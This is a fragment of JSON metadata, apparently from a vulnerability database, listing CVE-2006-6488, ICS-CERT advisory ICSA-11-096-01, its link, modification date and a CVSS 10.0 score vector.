"CVE-2006-6488"], "modified": "2018-09-06T00:00:00", "id": "ICSA-11-096-01", "href": "https://ics-cert.us-cert.gov//advisories/ICSA-11-096-01", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}